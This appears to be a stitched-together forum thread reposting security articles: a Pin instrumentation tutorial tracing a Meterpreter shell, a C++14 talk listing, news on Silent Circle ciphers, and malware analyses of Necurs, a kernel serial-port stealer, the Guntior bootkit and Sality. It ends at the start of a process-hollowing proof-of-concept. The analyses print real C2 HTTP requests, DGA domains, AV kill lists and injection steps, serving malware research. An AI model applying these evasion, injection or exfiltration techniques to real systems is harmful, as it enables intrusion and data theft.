SYSCALL_STANDARD std, VOID *v) { out << "[exit] Return: " << PIN_GetSyscallReturn(ctx, std) << endl; } KNOB KnobOutputFile(KNOB_MODE_WRITEONCE, "pintool", "o", "inscount.out", "specify output file name"); VOID Fini(INT32 code, VOID *v) { out.setf(ios::showbase); out.close(); } INT32 Usage() { cerr << "This tool counts the number of dynamic instructions executed" << endl; cerr << endl << KNOB_BASE::StringKnobSummary() << endl; return -1; } int main(int argc, char * argv[]) { if (PIN_Init(argc, argv)) return Usage(); out.open(KnobOutputFile.Value().c_str(), ios::out | ios::app); /* functions to get called on system calls */ PIN_AddSyscallEntryFunction(SyscallEntry, 0); PIN_AddSyscallExitFunction(SyscallExit, 0); PIN_AddFiniFunction(Fini, 0); PIN_StartProgram(); return 0; } You can simply run the program with “pin.exe -t MyPinTool.dll — meterpreter.exe” command as can be seen below. After you’ve pressed Ctrl-C to kill the pin and meterpreter process, the incount.txt file will be populated with all the system calls that happened during meterpreter execution. On the picture below you can see the “” lines that represent the system calls entry functions, where the system call number is printed as youll as three of its arguments. You’ve just seen that PIN framework captures every system call and gave us a change to react upon it; you chose to only write some text into the .txt file, but you might do something totally different; it all depends on our needs. You might catch only the connect system call and change the host and port to where the meterpreter.exe connects; the PIN can absolutely be used for that or other even more complicated things. You can also notice that only system call numbers youre printed. If you would like to print actual names, you would need to traverse the export directory of the ntdll.dll library and compare the system call number with the given number and once found, print the name of the function. When traversing the export directory, you should be using AddressOfNames, AddressOfFunctions, AddressOfNameOrdinals and NumberOfNames. You can see that this quickly gets complicated even when you have PIN on our side helping us. Note that PIN doesn’t support syscall id to name conversion as far as I know. You can also add the following code to the project and also “INS_AddInstrumentFunction(Instruction, 0);” to the main function, which will invoke the Instruction function on every executed instruction; that function will then write the instruction to the inscount.txt text file. VOID Instruction(INS ins, VOID *v) { out << "[iNS] " << INS_Disassemble(ins) << endl; } After the execution of Meterpreter, the start of the executed instruction will look like presented on the picture below. There you can clearly see all the executed instructions that youre needed to spawn reverse Meterpreter shell. Taint Analysis with Pin Here I’ll briefly present the summary of the article written by Jonathan Salwan, who used Pin for taint analysis; his blog post is presented at [3]. For any of you who don’t know what taint analysis is, it’s a method of detecting vulnerabilities in programs by marking registers and memory locations, which can be accessed with user-controlled input data, as tainted. This is useful because if a program later uses the tainted values stored in the registers or memory locations in specific way, this can be a possible security vulnerability. But how can a program use tainted vales to introduce a security vulnerability. For example, if you can change the value on the stack where the EIP was saved, the function will jump to that location when returning. Therefore if you overwrite that location with arbitrary value, you can jump to arbitrary location in memory, which is a typical stack overflow vulnerability. Whenever marking memory locations as tainted, you need to decide what the smallest tainted memory information it will be: 1 bit: useful if there are operations in the code that work with bits (not very common) 1 byte: useful whenever the code references al or ah or ax registers, which are the loyour 8-bits, higher 8-bits and loyour 16-bits of register EAX. 4 bytes: useful when the code only operates with normal registers, which hold 4 bytes of data. Whenever you need to decide what you would like to do, you must keep in mind that you need to reserve an additional amount of memory to store memory locations of tainted memory blocks. Normally, you would have a table representing the whole memory space of the application where you would store tainted and non-tainted memory blocks, but a great optimization is to store just the tainted memory blocks in a linked-list or somewhere. If you would like to know more about taint analysis with PIN, you can read about it in a great article at [3], where everything is explained in detail. In-Memory Fuzzing There’s another great article about in-memory fuzzing written by Jonathan Salwan and is accessible at [6]. In-memory fuzzing can be used to test a portion of the code in memory; for example, let’s suppose the program has embedded MD5 hash, which is being used to check whether the user should be logged into the system or not. The source code of a very simple C program can be seen below, where the hash contains the MD5 hash of the word ‘passwd’ and the str variable points to the inputted argument. The program then calculates the MD5 of the inputted password and compares that to the embedded MD5 hash. If the hashes match, it prints the success message, otherwise the error messages. #include "md5.h"#include using namespace std; int main(int argc, char **argv) { /* hash of 'passwd' and inputted argument password */ char *hash = "76a2173be6393254e72ffa4d6df1030a"; char *str = argv[1]; /* check if md5 matches the inputted password */ if(md5(str) == hash) { printf("Success: the entered password was right.\n"); } else { printf("Error: you didn't enter the right password.\n"); } system("PAUSE"); return 0; } Let’s first check whether the MD5 hash actually matches the ‘passwd’ string, so you won’t be working blindly here. It can be done very easily with the echo command passing it the ‘passwd’ string; note that you have to use the –n argument, which suppresses the terminating newline at the end of the string, which is needed for md5sum tool to print the right MD5 hash. In the output below, you can see that hash is correct. # echo –n "passwd" | md5sum 76a2173be6393254e72ffa4d6df1030a - Let’s compile and run the program in Visual Studio to see what you get. In Project Properties – Configuration Properties – Debugging, you have to input the ‘passwd’ string in “Command Arguments”, so you’ll be passing the right command line argument to the program. If the password is correct, the following will be printed to command line. If the password doesn’t match, the printed text will be as seen below. There you’re see it multiple times I stumbled upon such a problem in penetration testing in other applications. But still, the problem is the same, just the tools used are different. There are multiple ways to solve the problem: Python Script: you can program a simple Python script to brute force the login password until the hash matches. The problem is that you don’t know in advance what the binary is doing, so brute forcing the input argument seems like the last resort you want to use if everything else fails. FindMyHash: you can use findmyhash.py script, which connects to various sites passing them the embedded hash. Then try to crack the hash and report back on its status. If you want to use this approach, you need to open the binary with a debugger, understand the instructions and pull out the MD5 hash. This method requires a lot more work than writing the Python script, but the problem should be solved sooner. PIN Framework: you can use PIN framework to write a wrapper around the relevant instructions in binary program to brute force the password in memory. This approach is the coolest of them all and you will take a look at it here. You won’t talk about the first and second solutions in more detail, since they are self-explanatory. Rather, you’ll describe the third Pin Framework method in detail. First you should load the checkmd5.exe into Ida Pro for analysis. Right at the beginning, Ida Pro will correctly analyze the program, which can be seen below; on the left side there’s a block of code that gets executed when the hashes match and the code block on the right side gets executed when the hashes don’t match. The code right before than the one presented earlier must decide which code block to execute. That code can be seen below; note that I renamed a few functions to make it clearer; those functions are: std__allocate, std__allocate_0, std__equals and std__compare. I commented the code above to make it clearer, but essentially you’re just doing the same as in our C++ program, so nothing new there. Before actually running the program, you must define the password that will be passed to it, which can be done by clicking on Debugger – Process options and is also seen below. Notice that you inputted the passwd string into the Parameters input field, which is exactly the password, which will correctly instruct the program into printing “Success: the entered password was right.” If you run the program now, it would print the success message, since you inputted the right password. If you want to see a similar complete solution you can take a look at [6], where Jonathan Salwan explains is in detail. The implementation for brute forcing the MD5 is left as an exercise to the reader, but he/she should have all the details of how to do that. Conclusion You’ve seen that you can do a lot of interesting stuff with Pin framework; you can follow each instruction, function, system call, etc. By using Pin you have a complete control over the dynamically executing program. Therefore, you can use it in various tasks, when you would like to quickly do some actions on a running program; like brute forcing a MD5 password with Pin instead of using other methods. References: [1] Pin – A Dynamic Binary Instrumentation Tool, Sion Berkowits (Intel), Pin - A Dynamic Binary Instrumentation Tool | Intel® Developer Zone. [2] Pin 2.12 User Guide, Pin: Pin 2.12 User Guide. [3] Jonathan Salwan, Taint analysis and pattern matching with Pin shell-storm | Taint analysis and pattern matching with Pin. [4] Malware Unpacking Level: Pintool, Malware Unpacking Level: Pintool | Development & Security. [5] Pin Modules, Pin: Module Index. [6] In-Memory fuzzing with Pin, shell-storm | In-Memory fuzzing with Pin. Sursa: Pin: Dynamic Binary Instrumentation Framework

[h=1]C++14: Through the Looking Glass[/h] Date: September 5, 2013 from 1:15PM to 2:30PM Day 2 009 Speakers: Michael Wong [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, Windows Phone, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” Zip MP3 (Audio only) [h=3]File size[/h] 56.0 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 338.7 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 182.8 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 744.4 MB Mid Quality MP4 (Windows Phone, HTML5) [h=3]File size[/h] 520.1 MB High Quality WMV (PC, Xbox, MCE) “The time has come,” the ISO said, “To talk of many things: Of move-capture—and literals— Of making lambdas sing— And why deduction is so hot— And if digits should grow wings?” So have you heard of the next C++ Standard? No, it is not C++11. Even though C++11 has just been ratified, C++14 will likely replace C++11 by next year. By now, we have enough experience with C++11 to know where we are missing various fingers and toes such as: Why do we not have move capture in lambdas? How about some real user-defined literal suffixes? Why did we stop with monomorphic lambdas? If lambda returns can be deduced, why not normal functions? Could we get digit separators? C++14 will be more than a bug-fix release, and will contain some important enhancements on top of C++11. It will remove some of the major annoyances from C++11, that we already know of. But more importantly, how will this change the language, library and some important idioms? Sursa: C++14: Through the Looking Glass | GoingNative 2013 | Channel 9

Silent Circle Moving Away From NIST Ciphers in Wake of NSA Revelations by Dennis Fisher The first major domino to fall in the crypto world after the NSA leaks by Edward Snowden began was the decision by Lavabit, a secure email provider, to shut down in August rather than comply with a government order. Shortly thereafter, Silent Circle, another provider of secure email and other services, said it was discontinuing its Silent Mail offering, as well. Now, Silent Circle is going a step further, saying that it plans to replace the NIST-related cipher suites in its products with independently designed ones, not because the company distrusts NIST, but because its executives are worried about the NSA’s influence on NIST’s development of ciphers in the last couple of decades. Jon Callas, one of the founders of Silent Circle and a respected cryptographer, said Monday that the company has been watching all of the developments and revelations coming out of the NSA leaks and has come to the decision that it’s in the best interest of the company and its customers to replace the AES cipher and the SHA-2 hash function and give customers other options. Those options, Callas said, will include non-NIST ciphers such as Twofish and Skein. “At Silent Circle, we’ve been deciding what to do about the whole grand issue of whether the NSA has been subverting security. Despite all the fun that blogging about this has been, actions speak louder than words. Phil [Zimmermann], Mike [Janke], and I have discussed this and we feel we must do something. That something is that in the relatively near future, we will implement a non-NIST cipher suite,” Callas wrote in a blog post explaining the decision. Twofish is a cipher suite written by Bruce Schneier and it was one of the finalists during the AES competition, but lost out to the Rijndael algorithm. It has been resistant to cryptanalysis thus far, and Callas said it also has the advantage of being an easy replacement for AES in Silent Circle’s products. The company also will be replacing SHA-2, an older NIST hash function, with Skein, which was a finalists in the recently completed SHA-3 competition. “We are going to replace our use of the AES cipher with the Twofish cipher, as it is a drop-in replacement. We are going to replace our use of the SHA–2 hash functions with the Skein hash function. We are also examining using the Threefish cipher where that makes sense. (Full disclosure: I’m a co-author of Skein and Threefish.) Threefish is the heart of Skein, and is a tweakable, wide-block cipher. There are a lot of cool things you can do with it, but that requires some rethinking of protocols,” Callas said. The decision by Silent Circle comes at a time when there are many unanswered questions about the NSA‘s influence on cryptographic algorithm development, specifically those standards developed by NIST. The National Institute of Standards and Technology is responsible for developing technical standards for the U.S. federal government and many of those standards are adopted by other organizations, specifically crypto standards. Recent revelations from the NSA leaks have shown that the NSA has some unspecified capabilities against certain crypto algorithms and also has been working to influence NIST standards development. In response to one of these revelations, NIST itself has advised people to stop using the Dual EC_DRBG random number generator developed under its supervision. “The DUAL_EC_DRBG discussion has been comic. The major discussion has been whether this was evil or merely stupid, and arguing the side of evil has even meant admitting it is technologically a stupid algorithm, which sends the discussion into an amusing spiral of meta-commentary,” Callas said. Silent Circle’s move away from AES and SHA-2 shouldn’t be seen as an indictment of those two ciphers, Callas said, but more of an indication that there are better options out there without the shadow of potential NSA influence hanging over them. “This doesn’t mean we think that AES is insecure, or SHA–2 is insecure, or even that P–384 is insecure. It doesn’t mean we think less of our friends at NIST, whom we have the utmost respect for; they are victims of the NSA’s perfidy, along with the rest of the free world. For us, the spell is broken. We’re just moving on. No kiss, no tears, no farewell souvenirs,” he said. Sursa: https://threatpost.com/silent-circle-moving-away-from-nist-ciphers-in-wake-of-nsa-revelations/102452#.UkmXXBtaei8.twitter Sunt doar niste idei de luat in considerare.

[h=1]Necurs rootkit under microscope[/h] Okay, we already know about Necurs, just remind it interesting features: Highly difficult in terms of removal from infected system; Targeted to blocking drivers around 30 AV products [and 130 drivers in total]; Also targeted to x64 platform [has x64 version of driver]; Driver has obfuscated relocatable code; Provides for itself the earliest start in the system [before all AV or Anti-malware drivers and system drivers]; Has it's own PE-loader with features of module relocation and IAT tuning for creation a complete copy of working driver; Three types of black list: checking version info, special code signatures and drivers names. I already wrote about detection of this rootkit by various anti-rootkits here Security/malware blog: Necurs rootkit detection. In that post also listed symptoms of infection and various kernel anomalies. Today we'll talk about Necurs more detail. https://twitter.com/artem_i_baranov/status/284941235934875648 First of all - black list and how it's implemented. According to list, which is subject to examination by the rootkit, it includes about 30 various AV products (checking via version info), and 130 various drivers (checking via image names comparison). Full list of vendors avalaible here - Necurs targeted to prevent work products of these firms: Agnitum Ltd ALWIL S - Pastebin.com and list of drivers here - Necurs targeted to prevent work the following drivers: kprocesshacker.sys Vb - Pastebin.com. https://twitter.com/artem_i_baranov/status/284309401605648387 https://twitter.com/artem_i_baranov/status/284310691366727680 Before you start the static analysis you should retrieve decrypted version of driver. In normal encrypted state it looks like this: To be convinced that rootkit is active, you need to check presence of NtSecureSys device object. On the next step need to dump it decrypted body from memory with help of anti-rootkit or windbg. Ok, let's do it with windbg. Necurs sets some hooks to SSDT and this is one of the start point for dumping it image from memory. Next we can dump it from memory. Instead !pool command you can use search for MZ header in reverse order for retrieving start of decrypted copy: s 822bbe2b L-10000 'M' 'Z' Decrypted driver: Start point of black list checks - LoadImageNotifyRoutine function. Detailed info about this feature http://msdn.microsoft.com/en-us/library/windows/hardware/ff559957(v=vs.85).aspx. This callback is called every time when new driver [or user mode image] was loaded in system [or in process]. This function contains all types of blacklist checks. For example, on this screenshot below is represented check via vendors names in version info. If the driver is blacklisted, Necurs patches it entry point with two instructions, so DriverEntry after that returns STATUS_UNSUCCESSFULL and IO manager not load this driver. Rootkit also contains two special white lists of drivers that not included into black list. Collection of information into white list rootkit performs on stage of initialization. Rootkit performs scanning of \drivers directory and look for drivers not included into blacklist. Also it walks by services registry key and adds drivers into these lists. To avoid misunderstanding it adds loaders into these lists. Ways of drivers entry point modifications looks like: Necurs also blocks registry operations for own service key. So, any attempt to access to key fails. It possible with help of http://msdn.microsoft.com/ru-ru/library/windows/hardware/ff545879(v=vs.85).aspx Similar situation with file system. Necurs attaches his device object to volume and tracks all FS operation, so rootkit body on volume is unaccessible. Another interesting feature of Necurs - possibility of start before ALL drivers in the system [including boot bus extender drivers]. But on clean system we have another picture: Ok, all right. The conclusion is obvious: Necurs adds itself into "Boot Bus Extender" group and modifies priority ("Tag") of all drivers from this group (increases their Tag numbers by one, +1). Detailed about priority of drivers load, look CurrentControlSet\Services Subkey Entries Summary: Necurs also registers callback for tracking operations about handle creation for process with help of ObRegisterCallback. API - http://msdn.microsoft.com/en-us/library/windows/hardware/ff558692(v=vs.85).aspx From this callback rootkit performs modification of original final desired access for the handle in special cases of handle opening. Mission of NtOpenProcessHook consists in blocking open handle operation for process which rootkit considers as trusted. According to Microsoft Malware Protection Center (MMPC) Necurs found on more than 83,000 machines and Microsoft report calls rootkit a "prevalent threat". This is not surprising after disclosure of the threat, it becomes clear why this is so. http://www.darkreading.com/risk-management/167901115/security/attacks-breaches/240144203/necurs-rootkit-spreading-quickly-microsoft-warns.html Unexpected reboot: Necurs - Microsoft Malware Protection Center - Site Home - TechNet Blogs Fingerprints: x32 version: SHA256: 742a3c8c0a3601af29daffb966e947334d4f20501e5568b9c9fbf4c3526b4b84 SHA1: 30f63b8cae41a97456a82131c4577a2020697b89 MD5: 0907292986e05a8752bc1863556d229e File size: 59776 bytes x64 version: SHA256: b3fea8183670ecf6150325f05aed28dfa27d7c6d2c1007808661f97c27fd7e1e SHA1: d69b06801a8378e8c9ac8b369cb9e14ef8c8d479 MD5: 39b447e293979ac7259d4d9a2711c9a0 File size: 75720 bytes posted by https://twitter.com/artem_i_baranov Posted 29th December 2012 by Artem Sursa: Security/malware blog: Necurs rootkit under microscope

[h=1]Investigation an interesting kernel mode stealer[/h] https://twitter.com/artem_i_baranov/status/228409424996352001 About two weeks ago my friend R136a1 from kernelmode forum came across with dropper that installs driver in the system. We decide make research of them, and it was not a mistake of starting it analyse... Initial dropper hash: SHA1: a53d0ef7b3a9f81b133c36af60d2b6acd0f82b74 MD5: 9c0744b8119df63371b83724bafe2095 File size: 32768 bytes On this moment can tell exactly that only one or two vendors identified it with malware family. Main purpose of dropper - extract driver from itself and install it in the system. Driver masked as USB-driver and always extracted with same name - usbhc.sys. Hash: SHA1: a53d0ef7b3a9f81b133c36af60d2b6acd0f82b74 MD5: 9c0744b8119df63371b83724bafe2095 File size: 32768 bytes One of the most strange thing that I discovered - driver is a fully standalone and not receives commands from user mode. And of course, it not create device object and symbolic link. for user mode interaction. Research led me to a conclusion that driver has one main purpose - stealing data from devices that connect to serial ports of computer and sending it to remote server... For stealing data from these devices it performs preparatory operations. First, it reads the contents of \REGISTRY\MACHINE\HardWare\DeviceMap\SERIALCOMM that stores devices attached to serial ports [devices representing serial ports]. Second, it performs attaching to all this devices. After rootkit attached it device, device stack of serial has view: Second very interesting thing in this case that all network-based communication with remote server also found in driver: - DGA (Domain Generation Algorithm) - DNS via UDP (for convert domain names into IP) - HTTP-based communication via TCP - Special communication with ndisrd.sys driver. For retrieving domains and resolve it to IP-addresses, driver uses such technique. First, it looking for DhcpNameServer parameter for each interface that it found at \REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ On next step, it generates domains and calls DNS-service for response about it status. All further communication will be done through this server (which was received via DNS). In the end of post listed all domains that it polls. Network communication completely based on TDI (Transport Device Interface) [look WDK for it description or this tutorial Driver Development Part 5: Introduction to the Transport Device Interface - CodeProject] Preparing the server connection has the form (in SDK term - creating socket). Next it will connect to remote server: Internally in driver, socket described by this structure: struct TDI_CONNECTION_INTERNAL { PFILE_OBJECT foTransportAddress; HANDLE hTransportAddress; PVOID foConnection; HANDLE hConnection; .... } After connection with server was set, it can send requests to it via HTTP. Requests have view: GET /srv.php?&id=uniqueID&mark=METKA&special_marker_opt HTTP/1.1 Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: host Connection: close Simple communication with server has view (rollcall): -> GET /srv.php?&id=GOG73FRHOBFI&mark=METKA HTTP/1.1 Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: perwadav.org Connection: close <- HTTP/1.1 200 OK..Date: Mon, 23 Jul 2012 17:13:16 GMT Server: Apache/2.2.3 (CentOS)..X-Powered-By: PHP/5.1.6 Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 SERVERISOK -> server status After connection was established, driver performs downloads a dropper of ndisrd.sys from server, with request: GET /srv.php?&id=uniqueID&mark=METKA&f=os_ver HTTP/1.1 Variable of os_ver has view n_xp_32 or n_7_32 Basic requests formed with func: Conversation: Driver perform saving dropper into: \SystemRoot\System32\kb_random.exe In my case: \SystemRoot\System32\kbVOTHBNAU.exe From driver: Downloaded dropper: SHA1: 911c027e5f4acf4a75d0cf8e751d0ba8fbbd0959 MD5: a93b5454f4492a4a8d971811f2d12b1e File size: 81805 bytes After dropper was downloaded, it will be installed by driver. Installation performs in context of trusted process - explorer or services (in depend of OS version). Purpose of downloaded dropper - installation of ndisrd.sys driver. Rootkit driver performs opening device of ndisrd. Purpose of IOCTLs that rootkit sends to NDISRD could not identified, but there is a list of them: 830020D0 830020D4 830020D8 830020DC 830020C4 As I said before main purpose of rootkit - stealing data from serial devices and sending it to server. Stealing of data performed with registering of completion routine in Write and Read - IRP-dispatch functions. Driver registers the device in the chain of serial-devices, and can see all requests that pass through the chain. IRP_MJ_READ handler - registers completion routine and calls next on the stack. Completion routine has view: After data was captured, wakes up a special thread, which writes cached data to a file. Thread writes data to file - \SystemRoot\System32\svlog.log. After data was written, thread sets a special event which signaling that data was written to file. Thread that response for sending data from file to server: -> GET /srv.php?&id=GOG73FRHOBFI&mark=METKA&a= HTTP/1.1 Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: perwadav.org Connection: close Data of file <- HTTP/1.1 200 OK..Date: Mon, 23 Jul 2012 17:13:16 GMT Server: Apache/2.2.3 (CentOS)..X-Powered-By: PHP/5.1.6 Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 SERVERISOK -> server status Information about malicious domain: This guy linkedin profile Nikolay Petrachkov | LinkedIn. You can download paper about dropper by R136a1 here http://artemonsecurity.com/research_of_unk_malware.pdf List of domains: oqdxvvbk.com perwadav.org ebcgndvj.org qdrhandp.org tbkfopaf.org twmhimdj.org thgdabbj.com efjwirmb.org qxkomgei.com bbfsyfsr.com jbpgfqra.org anwfejhx.com frstfnuh.org xbcfgule.com cyfohwwf.com catjdhuu.org woyhiepx.org fmegpykr.com bowgtptk.com dnrdyute.org jchgbmmo.org poxldxhv.org mkrhwons.org aovinvsi.org ivogeuom.com mubrnyxd.org emhedcxc.org ibqanwif.org umspakwh.org wianbpdb.com oejkewmq.org gqnjmmgd.org lpdbwrfu.com kwkdraat.org dfogsbau.org gjfxavjw.org idrlbacl.org xavostmi.org sxdhddbb.com wbqwvapj.org jiqcsvng.com gkceusvc.com vssqfbmq.org pcawxcwp.com lpjnerpe.org safcoyho.com llbeoaix.com oirhxgpf.org ygdmlsgl.org fyxfattr.com tdcqhkne.com wwdstess.org eexeufwo.org wbwfjosa.org ixskfbvp.org fmcspasm.org wdjjkmwv.com svpaidvo.org vnhcftma.org twjotfct.org fwlckqdv.org bjfgwabb.com cdobjfic.org qjfhsiua.org enldxohy.com dcnpyqlg.org nsbjdfyq.org cyhwpiaw.org mnbpwbjj.org volgbbox.org tgrwfjpv.com lgqxwrkf.org xwalgbjg.com yuwbhxeu.com hulosvof.org qxpvprdy.com ijjxoocp.org fbrebqna.com tpxirylu.com keukrpqf.org rxyjkcwj.org oucmtrhv.com rxftpvku.com wlxrrqyd.org ybljdhos.org qwkpxcct.org qecgrdxg.org dudfymdl.org sesjvgii.com yxcxjriu.org ljmiphjx.org btotkygq.org fodbotqn.org rfsojypy.com mbdoebhh.org johqyxsw.org gldfgkey.com fvpujviq.org fyclctjf.org xnvwdmyf.org posted by https://twitter.com/artem_i_baranov Posted 26th July 2012 by Artem Sursa: Security/malware blog: Investigation an interesting kernel mode stealer

[h=1]Guntior - detailed analysis of the Chinese bootkit[/h] https://twitter.com/artem_i_baranov/status/225509678367506433Original dropper that contains bootkit dropper: SHA1: e83ca87a39a5f15ca5942fd57d78e790861c2937 MD5: 15e692cf34a70fb364591622bff1e43a File size: 86027 bytes This original dropper extracts bootkit dropper from itself and launches it on execution with same name. Bootkit dropper: SHA1: 5ecefefe4bbfc040927e827ab81c10caf5d10f90 MD5: f72e3d86b8f4f97d103ff1b7f87213f2 File size: 54272 bytes Bootkit dropper stores it components in resource section in crypted state. Decryption routine has view: Bootkit dropper has an interesting method of calling OEP via SEH handler with generating an exception. OEP has view (dropper supports two modes of running - as dll and exe). Anti-debug/anti-emu feature: On the next stage it performs an interesting trick to load itself via dll and continuing initialization as dll. In the first, it copies itself to system directory with random name.tmp and patches PE-characteristics by setting Dll flag. In the second, it hooks imm32.dll!ImmLoadLayout and ntdll.dll!ZwQueryValueKey. ZwQueryValueKey hook has view: After hooks were set it tries initiate keyboard layout switching (that was already registered via creating new parameter in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts). Malicious keyboard layout has view: Finally revert layout to original. Second stage initialization via dll loading. At this stage dll should be loaded into working processes in system and first that it does - sets special event to signal bootkit exe dropper about success of running. So, if injection was failed, it runs next phase. Before load it's driver, it performs some actions targeted to disable some protections that can present in the system. - In case of HintClient.exe that belongs to company Shanghai Hintsoft Co.,LTD. - http://www.hintsoft.com.cn/ sends a special IOCTL code to it driver (look code at 00403A3B). - In case of Drvmon (drivers monitoring tool) also sends a special IOCTL to unknown driver (look code at 00403B0A). Next it loads driver and infects MBR. Driver: SHA1: adcdee632d7915f5e73669d809d9713e9250b81d MD5: c1f5c5af49243e497ae979f2622ab5d0 File size: 4704 bytes Features of driver: - Low-level disk I/O - Processes killlig Creates device with name \Device\Guntior for communicate with ring3. \Device\Guntior \??\Guntior RSDS C:\sys.pdb memcpy MmMapLockedPagesSpecifyCache memset IoDeleteSymbolicLink RtlInitUnicodeString IoDeleteDevice RtlGetVersion IofCompleteRequest IoCreateSymbolicLink IoCreateDevice PsLookupProcessByProcessId MmIsAddressValid ObfDereferenceObject ObReferenceObjectByPointer ntoskrnl.exe WRITE_PORT_BUFFER_USHORT HalGetBusData READ_PORT_BUFFER_USHORT KfRaiseIrql KfLowerIrql Driver is a loaded via very interesting trick with sending a special IOCTL to PnpManager. Unlike other bootkits that intercept functions of disk.sys or atapi.sys for hiding malicious MBR and payload in the end of the disk, this bootkit intercepts nothing and supports unloading (it has an unloading routine). Original (not-infected) MBR has view: Malicious (by 0x190 offset it stores offset of its extension): In the end of disk bootkit stores: - Original MBR - Extension of malicious boot-code - Dll - Driver Main payload is stored into dll [resource number 111]. Dropper extracts it from resource, decrypts and writes into systemroot\system32\appmgmts.dll. It also completely rewrites systemroot\system32\sfc_os.dll by dll body. Internally dll stored as rewritten sfc_os.dll from Chinese Windows XP. Dll targeted to killing processes: nod32krn.exe egui.exe ekrn.exe 360tray.exe 360leakfixer.exe 360Safe.exe safeboxTray.exe 360safebox.exe 360sd.exe ZhuDongFangYu.exe 360rp.exe 360sdupd.exe Calc.exe KSWebShield.exe kxesapp.exe kxeserv.exe kwstray.exe kxedefend.exe upsvc.exe kxescore.exe KVExpert.exe kxetray.exe KSafeSvc.exe KSafeTray.exe guiyingfix.exe RavMonD.exe RsTray.exe RsAgent.exe RegGuide.exe RsMain.exe RsCopy.exe Rav.exe KVSrvXP.exe KVExpert.exe KVMonXp.exe avp.exe avp.exe ras.exe knownsvr.exe rstray.exe knsdtray.exe knsd.exe knsdsvc.exe knsdsve.exe QQPCLeakScan.exe QQPCWebShield.exe QQPCTAVSrv.exe QQPCRTP.exe QQPCMgr.exe QQPCUpdateAVLib.exe QQPCTray.exe QQRepair.exe QQPCPatch.exe Killing processes code: HTTP-request: HTTP/1.1 Accept: */* Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: %s Connection: Keep-Alive Dropper with decrypted payload available for download here: KernelMode.info • View topic - Guntior bootkit (Chinese combine) Dumps of malicious code with some comments by Peter here: KernelMode.info • View topic - Guntior bootkit (Chinese combine) posted by https://twitter.com/artem_i_baranov Posted 18th July 2012 by Artem Sursa: Security/malware blog: Guntior - detailed analysis of the Chinese bootkit

[h=1]Sality rootkit analysis[/h] Sality is a well known family of file-infectors (or PE-infectors or just a viruses). And as malware it has a very long story of evolution since 2003. Latest it versions contain rootkit on board to complicate detection from side of AV-scanners. Driver has such features: Processes termination via NtTerminateProcess; Blocking access to some AV web-resources via IP Filtering; Small size ~ 5 KB. According analysis, rootkit is targeted to Windows starting NT4 and finishing Vista. It should be said in advance that this rootkit is not a NEW and not contains some features which have modern rootkits or bootkits. Researched version of rootkit has appeared ITW since beginning of 2010. Rootkit creates device with name: \Device\amsint32 \DosDevices\amsint32 and this is signal to infection. Rootkit contains usual most famous way of process killing, which is used by almost all "old-school" rootkits. Sality uses old model of IP filtering for blocking access to web-resources that belong AV-vendors. This technique is called IP Filtering. More info: Windows 2000 Filter-Hook Driver example NT networking & kernel mode: drivers, articles, sources and MSDN http://msdn.microsoft.com/en-us/library/windows/hardware/ff548976(v=vs.85).aspx. List of affected vendors: This feature requires from driver to registering a callback function which will be called for IP-packets. This function will decide what to do with the packet: to forward it or drop. Registered callback - fnFilterHookIP will looking for presence of AV-vendors strings in data of packet. In case of hit it forces IP-driver to drop this packet. Encrypted AV vendors strings in it body: Detection ratio: SHA256: e0b193d47609c9622aa018e81da69c24b921f2ba682f3e18646a0d09ec63ac2b SHA1: ef9a19ba89021179930888264290367b5d106a44 MD5: bf31a8d79f704f488e3dbcb6eea3b3e3 File size: 5157 bytes posted by https://twitter.com/artem_i_baranov Posted 15th January by Artem Sursa: Security/malware blog: Sality rootkit analysis

[h=2]New method of injection[/h] [h=2]Introduction[/h] I disovered a new method of injection (I don't know if it is really new) in a malware dropped by duqu. So I want to share it with you and as usual write a p0c. Edit : This method is not new, apparently it have been using by game cheats for years, but instead of using ZwUnmapViewOfSection they use FreeLibrary. [h=2]Injection Method[/h] The malware in question is simply a keylogger, but it uses a nice tricks for injecting into another process. First it will create (as usual) a suspended lsass.exe process via CreateProcess(). Then it will gather process information via ZwQueryInformationProcess(), especially PebBaseAddress. But what can he do with this address, if we look at PEB struct : >dt nt!_PEB +0x000 InheritedAddressSpace : UChar +0x001 ReadImageFileExecOptions : UChar +0x002 BeingDebugged : UChar +0x003 SpareBool : UChar +0x004 Mutant : Ptr32 Void +0x008 ImageBaseAddress : Ptr32 Void It will get the ImageBaseAddress at offset 0x8, by reading it with ReadProcessMemory(). First it create a section with ZwCreateSection(), then it will in the actual process (not in lsass.exe supended), ZwMapViewOfSection() with argument BaseAdress equal to 0, copy old lsass.exe PE image and modify entry point, he will do the same operation on lsass.exe process but with BaseAdress equal to BaseImage, but wait ! if we read the documentation of ZwMapViewOfSection, we will get a NTSTATUS equal to STATUS_CONFLICTING_ADDRESSES, and the answer is no, because before the second ZwMapViewOfSection, it will perform ZwUnmapViewOfSection() with BaseAddress equal to ImageBaseAddress on lsass.exe process. And if you wonder : "Wait what !? is it possible ?", and the answer is yes. With this tricks the malware is able to replace ALL the PE image of the suspended process. [h=2]p0c[/h] So I decided to rewrite this tricks, to well understand the stuff done by the malware ( maybe you will better understand what I explained before ). Tested under Windows XP SP3, and Windows Seven SP1 (32 bits). Main.c : #include "main.h"int get_entrypoint(char 